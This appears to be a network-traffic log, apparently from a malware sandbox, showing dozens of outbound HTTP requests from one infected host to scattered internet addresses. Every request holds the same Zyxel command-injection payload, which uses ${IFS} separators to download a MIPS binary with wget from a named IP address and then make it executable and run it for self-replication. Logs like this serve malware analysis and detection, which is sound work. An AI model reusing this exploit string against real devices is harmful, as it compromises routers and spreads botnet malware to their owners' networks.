                                              Jan 29, 2024 07:03:44.908956051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3134192.168.2.1456330152.250.103.16443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.909002066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3135192.168.2.1442532188.229.112.91443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.909039974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3136192.168.2.1445030192.14.35.138443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.909075975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3137192.168.2.1440318160.135.222.113443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.909131050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3138192.168.2.145163496.43.64.206443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.909159899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3139192.168.2.145572077.182.107.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.909212112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3140192.168.2.1447518162.198.207.31443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.909245968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3141192.168.2.144051238.19.157.91443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.909270048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3142192.168.2.1459174187.245.251.242443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.909311056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3143192.168.2.1438044145.167.165.65443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.909339905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3144192.168.2.144497099.14.106.173443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.909405947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3145192.168.2.1447540104.120.66.153443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.909446001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3146192.168.2.1444916137.120.229.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.909502983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3147192.168.2.1440368107.165.189.77443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.909537077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3148192.168.2.145292090.59.128.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.909576893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3149192.168.2.144227231.217.122.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.909611940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3150192.168.2.143620679.9.179.161443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.909640074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3151192.168.2.1444578133.190.64.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.909693956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3152192.168.2.1450098222.45.6.146443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.909724951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3153192.168.2.1434624189.161.25.120443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.909765005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3154192.168.2.1444680207.182.255.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.909817934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3155192.168.2.1459574203.32.188.90443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.909851074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3156192.168.2.1454894159.223.43.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.909873009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3157192.168.2.143452273.156.30.185443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.909921885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3158192.168.2.145858273.18.35.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.909966946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3159192.168.2.143422881.220.105.199443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.909979105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3160192.168.2.1444772153.159.86.162443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.910043955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3161192.168.2.145435282.39.122.88443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.910068989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3162192.168.2.1438618136.251.43.205443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.910120964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3163192.168.2.14606948.234.138.178443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.910166979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3164192.168.2.143343032.245.192.225443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.910200119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3165192.168.2.1452838196.202.180.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.910238981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3166192.168.2.144488293.9.216.192443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.910271883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3167192.168.2.14500589.244.139.153443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.910307884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3168192.168.2.14338344.210.41.126443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.910365105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3169192.168.2.143474044.114.218.204443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.910398006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3170192.168.2.1451532187.239.191.21443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.910439968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3171192.168.2.1455818161.231.179.161443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.910475016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3172192.168.2.14535208.242.98.21443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.910521984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3173192.168.2.1455914163.74.81.5443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.910562992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3174192.168.2.143475619.207.190.130443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.910620928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3175192.168.2.145305864.213.244.159443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.910660028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3176192.168.2.143478858.249.67.164443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.910692930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3177192.168.2.1449168192.71.214.12443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.910728931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3178192.168.2.1435522197.241.205.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.910780907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3179192.168.2.1460974212.225.229.17443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.910801888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3180192.168.2.14493081.168.147.57443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.910865068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3181192.168.2.1460982105.54.92.231443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.910904884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3182192.168.2.1437168124.89.194.120443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.910938978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3183192.168.2.1458612119.11.83.103443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.910988092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3184192.168.2.145277620.154.228.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.911024094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3185192.168.2.145123871.141.118.240443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.911077976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3186192.168.2.143371689.78.23.244443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.911103010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3187192.168.2.1451068125.252.211.206443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.911134005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3188192.168.2.1447388121.189.65.101443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.911175966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3189192.168.2.1455712122.247.212.13443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.911204100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3190192.168.2.144858492.201.246.76443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.911254883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3191192.168.2.1437710108.4.27.116443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.911288977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3192192.168.2.143346431.45.159.31443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.911326885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3193192.168.2.145440837.13.206.36443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.911345959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3194192.168.2.143392292.138.179.6443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.911385059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3195192.168.2.1438720160.136.174.90443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.911410093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3196192.168.2.145194627.244.134.115443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.911458015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3197192.168.2.1439596115.46.14.5443
                                              TimestampBytes transferredDirectionData
